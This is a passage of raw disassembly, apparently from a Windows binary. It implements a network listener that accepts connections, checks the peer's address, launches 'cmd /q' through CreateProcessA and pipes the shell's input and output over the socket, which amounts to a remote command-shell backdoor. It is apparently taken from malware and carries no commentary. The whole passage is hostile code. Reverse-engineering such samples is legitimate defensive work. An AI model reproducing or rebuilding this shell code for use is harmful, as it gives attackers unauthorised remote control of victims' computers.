jnz short loc_410844
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_410844: ; CODE XREF: sub_4107C0+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call ds:dword_4CB66C ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_4109C5
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_4109C5
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_4109C5
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call ds:dword_4CB5A8 ; getpeername
test eax, eax
jz short loc_4108BD
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset unk_434854
call sub_415221
push [ebp+arg_0]
call sub_40B413
add esp, 0Ch
push edi
call dword_4270CC ; ExitThread
loc_4108BD: ; CODE XREF: sub_4107C0+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call ds:dword_4CB60C ; gethostbyaddr
cmp eax, edi
jnz short loc_4108E7
push [ebp+var_18]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_41B886
jmp short loc_4108F5
; ---------------------------------------------------------------------------
loc_4108E7: ; CODE XREF: sub_4107C0+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_41BEB0
loc_4108F5: ; CODE XREF: sub_4107C0+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_43D808
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
cmp ds:dword_4CE3B8, edi
jnz short loc_410957
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_410A1F
add esp, 10h
test eax, eax
jnz short loc_410957
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_410957: ; CODE XREF: sub_4107C0+14C�j
; sub_4107C0+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_434818
call sub_415221
push [ebp+arg_0]
call sub_410CD6
add esp, 10h
test eax, eax
jnz short loc_41099E
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_4347EC
call sub_415221
push [ebp+arg_0]
call sub_40B413
add esp, 0Ch
push ebx
call dword_4270CC ; ExitThread
loc_41099E: ; CODE XREF: sub_4107C0+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_4347C0
call sub_415221
push [ebp+arg_0]
call sub_40B413
add esp, 10h
push edi
call dword_4270CC ; ExitThread
sub_4107C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109C5 proc near ; CODE XREF: sub_4107C0+9A�p
; sub_4107C0+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
cmp eax, 1
jnz short loc_410A15
mov esi, [ebp+arg_4]
loc_4109E3: ; CODE XREF: sub_4109C5+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_410A0A
test al, al
jz short loc_410A19
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
cmp eax, 1
jz short loc_4109E3
jmp short loc_410A15
; ---------------------------------------------------------------------------
loc_410A0A: ; CODE XREF: sub_4109C5+27�j
push offset unk_434880
call sub_415221
pop ecx
loc_410A15: ; CODE XREF: sub_4109C5+19�j
; sub_4109C5+43�j
xor eax, eax
jmp short loc_410A1C
; ---------------------------------------------------------------------------
loc_410A19: ; CODE XREF: sub_4109C5+2B�j
push 1
pop eax
loc_410A1C: ; CODE XREF: sub_4109C5+52�j
pop esi
leave
retn
sub_4109C5 endp
; =============== S U B R O U T I N E =======================================
sub_410A1F proc near ; CODE XREF: sub_4107C0+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_410A4A
push [esp+arg_4]
push [esp+4+arg_0]
push offset unk_4348AC
call sub_415221
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_410A4A: ; CODE XREF: sub_410A1F+11�j
push 1
pop eax
retn
sub_410A1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A4E proc near ; DATA XREF: sub_401ACD+23D5�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call ds:dword_4CB5C4 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_410AA7
push eax
push offset unk_434A1C
call sub_415221
push [ebp+var_4C]
call sub_40B413
add esp, 0Ch
push edi
call dword_4270CC ; ExitThread
loc_410AA7: ; CODE XREF: sub_410A4E+3A�j
push edi
push offset loc_410CCC
call dword_427120 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_410AE0
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_4349D8
call sub_415221
pop ecx
pop ecx
call ds:dword_4CB5AC ; WSACleanup
push [ebp+var_4C]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_410AE0: ; CODE XREF: sub_410A4E+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call ds:dword_4CB654 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call ds:dword_4CB6D4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410C57
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_43E59C[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_4CB680 ; bind
test eax, eax
jnz loc_410C57
push 7FFFFFFFh
push ebx
call ds:dword_4CB67C ; listen
test eax, eax
jnz loc_410C57
push offset unk_43499C
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_4151AD
pop ecx
mov [ebp+arg_0], edi
loc_410B6F: ; CODE XREF: sub_410A4E+15A�j
; sub_410A4E+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call ds:dword_4CB6E8 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_410C5A
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call ds:dword_4CB634 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_410B6F
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset unk_434958
push eax
call sub_41B886
lea eax, [ebp+var_414]
push eax
call sub_4151AD
push edi
lea eax, [ebp+var_414]
push 9
push eax
call sub_40B0F7
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_43E594[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_4107C0
lea eax, [ebp+var_10]
push esi
push eax
call dword_42707C ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_43E5A4[ecx], eax
jz short loc_410C42
loc_410C2F: ; CODE XREF: sub_410A4E+1F2�j
cmp [ebp+var_38], esi
jnz loc_410B6F
push 32h
call dword_427078 ; Sleep
jmp short loc_410C2F
; ---------------------------------------------------------------------------
loc_410C42: ; CODE XREF: sub_410A4E+1DF�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_43491C
call sub_415221
pop ecx
pop ecx
jmp short loc_410C5A
; ---------------------------------------------------------------------------
loc_410C57: ; CODE XREF: sub_410A4E+C8�j
; sub_410A4E+EC�j ...
mov edi, [ebp+arg_0]
loc_410C5A: ; CODE XREF: sub_410A4E+13C�j
; sub_410A4E+207�j
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset unk_4348E4
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_410C9A
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_409A73
add esp, 14h
loc_410C9A: ; CODE XREF: sub_410A4E+22A�j
lea eax, [ebp+var_414]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push ebx
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5AC ; WSACleanup
push [ebp+var_4C]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
pop ebx
loc_410CCC: ; DATA XREF: sub_410A4E+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_410A4E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CD6 proc near ; CODE XREF: sub_4107C0+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_410E27
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_43E59C[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, dword_42707C
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_410FF9
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_410D41
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434A7C
call sub_415221
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_410D7B
; ---------------------------------------------------------------------------
loc_410D41: ; CODE XREF: sub_410CD6+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4110AB
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_410D82
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434A7C
call sub_415221
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call dword_4270AC ; TerminateThread
loc_410D7B: ; CODE XREF: sub_410CD6+69�j
xor eax, eax
jmp loc_410E22
; ---------------------------------------------------------------------------
loc_410D82: ; CODE XREF: sub_410CD6+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call dword_427124 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_410DDC
dec eax
jz short loc_410DD6
dec eax
jz short loc_410DC2
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434A48
call sub_415221
pop ecx
pop ecx
jmp short loc_410DF1
; ---------------------------------------------------------------------------
loc_410DC2: ; CODE XREF: sub_410CD6+D5�j
mov edi, dword_4270AC
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_410DF1
; ---------------------------------------------------------------------------
loc_410DD6: ; CODE XREF: sub_410CD6+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_410DE0
; ---------------------------------------------------------------------------
loc_410DDC: ; CODE XREF: sub_410CD6+CF�j
push ebx
push dword ptr [esi+14h]
loc_410DE0: ; CODE XREF: sub_410CD6+104�j
call dword_4270AC ; TerminateThread
push 1
push dword ptr [esi+8]
call dword_4270F0 ; TerminateProcess
loc_410DF1: ; CODE XREF: sub_410CD6+EA�j
; sub_410CD6+FE�j
push dword ptr [esi+10h]
mov edi, dword_427068
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call ds:dword_4CB6EC ; closesocket
push esi
call sub_41B0B1
pop ecx
push 1
pop eax
loc_410E22: ; CODE XREF: sub_410CD6+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_410CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E27 proc near ; CODE XREF: sub_410CD6+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, edi
jz loc_410F11
mov ebx, dword_4270FC
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, dword_427068
test eax, eax
jnz short loc_410E8A
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434B2C
jmp short loc_410EAA
; ---------------------------------------------------------------------------
loc_410E8A: ; CODE XREF: sub_410E27+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_410EB2
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434AEC
loc_410EAA: ; CODE XREF: sub_410E27+61�j
call sub_415221
pop ecx
jmp short loc_410EE0
; ---------------------------------------------------------------------------
loc_410EB2: ; CODE XREF: sub_410E27+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_410F20
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_410F15
push offset unk_434AC4
call sub_4151AD
loc_410EE0: ; CODE XREF: sub_410E27+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_410EEC
push [ebp+var_4]
call edi ; CloseHandle
loc_410EEC: ; CODE XREF: sub_410E27+BE�j
cmp [ebp+var_8], 0
jz short loc_410EF7
push [ebp+var_8]
call edi ; CloseHandle
loc_410EF7: ; CODE XREF: sub_410E27+C9�j
mov eax, [esi]
test eax, eax
jz short loc_410F00
push eax
call edi ; CloseHandle
loc_410F00: ; CODE XREF: sub_410E27+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_410F0A
push eax
call edi ; CloseHandle
loc_410F0A: ; CODE XREF: sub_410E27+DE�j
push esi
call sub_41B0B1
pop ecx
loc_410F11: ; CODE XREF: sub_410E27+1D�j
xor eax, eax
jmp short loc_410F1B
; ---------------------------------------------------------------------------
loc_410F15: ; CODE XREF: sub_410E27+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_410F1B: ; CODE XREF: sub_410E27+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_410E27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F20 proc near ; CODE XREF: sub_410E27+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_41B590
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41B590
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, dword_4270F8
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call dword_4270F4 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call dword_42706C ; CreateProcessA
test eax, eax
jz short loc_410FDC
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43E598[eax], ecx
call dword_427068 ; CloseHandle
jmp short loc_410FF2
; ---------------------------------------------------------------------------
loc_410FDC: ; CODE XREF: sub_410F20+9A�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_434B6C
call sub_415221
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_410FF2: ; CODE XREF: sub_410F20+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_410F20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FF9 proc near ; DATA XREF: sub_410CD6+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, dword_4270E8
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_411022: ; CODE XREF: sub_410FF9+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_41108A
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_41105D
loc_411033: ; CODE XREF: sub_410FF9+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_41104D
cmp dl, 0Dh
jz short loc_41104D
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_41104D: ; CODE XREF: sub_410FF9+44�j
; sub_410FF9+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411033
loc_41105D: ; CODE XREF: sub_410FF9+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call ds:dword_4CB6A4 ; send
test eax, eax
jle short loc_41108A
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_411022
; ---------------------------------------------------------------------------
loc_41108A: ; CODE XREF: sub_410FF9+2D�j
; sub_410FF9+79�j
mov esi, dword_42708C
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_4110A6
call esi ; RtlGetLastWin32Error
push eax
push offset unk_434BAC
call sub_415221
pop ecx
pop ecx
loc_4110A6: ; CODE XREF: sub_410FF9+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_410FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110AB proc near ; DATA XREF: sub_410CD6+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_4110C4: ; CODE XREF: sub_4110AB+39�j
; sub_4110AB+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call ds:dword_4CB66C ; recv
test eax, eax
jle loc_4111C9
cmp [ebp+var_10], ebx
jbe short loc_4110E6
dec [ebp+var_10]
jmp short loc_4110C4
; ---------------------------------------------------------------------------
loc_4110E6: ; CODE XREF: sub_4110AB+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_4111A9
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411156
cmp al, 7Fh
jz short loc_411156
cmp al, 3
jnz short loc_411111
push ebx
push ebx
call dword_427128 ; GenerateConsoleCtrlEvent
jmp short loc_41117D
; ---------------------------------------------------------------------------
loc_411111: ; CODE XREF: sub_4110AB+5A�j
cmp al, 15h
jnz short loc_411133
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411169
; ---------------------------------------------------------------------------
loc_411133: ; CODE XREF: sub_4110AB+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_41116A
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411169
; ---------------------------------------------------------------------------
loc_411156: ; CODE XREF: sub_4110AB+52�j
; sub_4110AB+56�j
cmp esi, ebx
jbe short loc_411180
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411169: ; CODE XREF: sub_4110AB+86�j
; sub_4110AB+A9�j
pop ecx
loc_41116A: ; CODE XREF: sub_4110AB+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call ds:dword_4CB6A4 ; send
test eax, eax
jle short loc_4111C9
loc_41117D: ; CODE XREF: sub_4110AB+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_411180: ; CODE XREF: sub_4110AB+AD�j
cmp al, 0Dh
jnz loc_4110C4
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call dword_4270E0 ; WriteFile
test eax, eax
jz short loc_4111C9
xor esi, esi
jmp loc_4110C4
; ---------------------------------------------------------------------------
loc_4111A9: ; CODE XREF: sub_4110AB+47�j
cmp [ebp+var_C], ebx
jnz short loc_4111BA
mov [ebp+var_C], 1
jmp loc_4110C4
; ---------------------------------------------------------------------------
loc_4111BA: ; CODE XREF: sub_4110AB+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_4110C4
; ---------------------------------------------------------------------------
loc_4111C9: ; CODE XREF: sub_4110AB+2B�j
; sub_4110AB+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4110AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111CE proc near ; DATA XREF: sub_401ACD+2C08�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call ds:dword_4CB654 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call ds:dword_4CB6D4 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_43E59C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_4CB680 ; bind
test eax, eax
jnz loc_411370
push 0Ah
push edi
call ds:dword_4CB67C ; listen
test eax, eax
jnz loc_411370
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset dword_42BFBC
push eax
call sub_41B886
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_4112A9
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409A73
add esp, 14h
loc_4112A9: ; CODE XREF: sub_4111CE+B9�j
; sub_4111CE+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_4151AD
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4CB6E8 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset dword_434C58
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2D4]
push 19h
push eax
call sub_40B0F7
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_43E594[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_4113D3
push esi
push esi
call dword_42707C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43E5A4[ecx], eax
jz short loc_411350
loc_41133D: ; CODE XREF: sub_4111CE+180�j
cmp [ebp+var_28], esi
jnz loc_4112A9
push 5
call dword_427078 ; Sleep
jmp short loc_41133D
; ---------------------------------------------------------------------------
loc_411350: ; CODE XREF: sub_4111CE+16D�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset dword_434C1C
push eax
call sub_41B886
add esp, 0Ch
jmp loc_4112A9
; ---------------------------------------------------------------------------
loc_411370: ; CODE XREF: sub_4111CE+7B�j
; sub_4111CE+8C�j
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset dword_434BE8
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4113B3
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409A73
add esp, 14h
loc_4113B3: ; CODE XREF: sub_4111CE+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_4151AD
push [ebp+var_3C]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_4111CE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113D3 proc near ; DATA XREF: sub_4111CE+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
